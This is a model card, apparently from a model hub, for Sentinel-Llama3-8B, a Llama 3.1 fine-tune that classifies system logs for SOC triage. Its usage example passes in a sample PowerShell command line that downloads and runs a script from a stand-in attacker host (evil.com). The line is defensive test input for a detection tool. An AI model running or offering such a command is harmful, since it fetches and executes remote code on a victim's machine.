π‘οΈ Sentinel-Llama3-8B: AI for Cybersecurity Log Analysis
π Model Description
Sentinel-Llama3-8B is a specialized Large Language Model (LLM) fine-tuned for Cybersecurity Operations. Built upon the powerful Meta Llama 3.1 8B Instruct architecture, this model has been trained on a diverse dataset of system logs, PowerShell commands, and process execution traces to detect and classify security threats.
This model is designed to assist Blue Teams and SOC Analysts in automating the initial triage of system logs, reducing alert fatigue, and identifying malicious activities with high precision.
π Key Capabilities
- Benign vs. Malicious Classification: Accurately distinguishes between normal system administration tasks and potential threats.
- Threat Categorization: Can classify activities into specific MITRE ATT&CK categories, including:
- Command and Control (C2)
- Defense Evasion
- Ransomware Activity
- Suspicious Execution
- Credential Access
- Low False Positive Rate: Optimized to minimize false alarms on legitimate administrative commands (Benign logs).
π Performance
- Accuracy: ~82% (on internal test set).
- Precision (Benign): ~95% (High reliability for filtering safe logs).
- Recall (Benign): ~98%.
π How to Use
You can run this model locally using the unsloth library (recommended for speed) or standard transformers.
Using Unsloth (Fastest Inference)
from unsloth import FastLanguageModel
# 1. Load Model
model, tokenizer = FastLanguageModel.from_pretrained(
model_name = "Duong2006/sentinel-llama3-8b",
max_seq_length = 2048,
dtype = None,
load_in_4bit = True,
)
FastLanguageModel.for_inference(model)
# 2. Define Prompt Template
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.
### Instruction:
{}
### Input:
{}
### Response:
{}"""
# 3. Predict
instruction = "Analyze the following system log event and classify the activity."
input_log = "Process Name: powershell.exe\nCommand Line: powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('[http://evil.com/malware.ps1](http://evil.com/malware.ps1)')\nUser: DOMAIN\\Admin"
inputs = tokenizer(
[
alpaca_prompt.format(instruction, input_log, "")
], return_tensors = "pt").to("cuda")
outputs = model.generate(**inputs, max_new_tokens = 64, use_cache = True)
print(tokenizer.batch_decode(outputs)[0])
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support
Model tree for Duong2006/sentinel-llama3-8b
Base model
meta-llama/Llama-3.1-8B Finetuned
meta-llama/Llama-3.1-8B-Instruct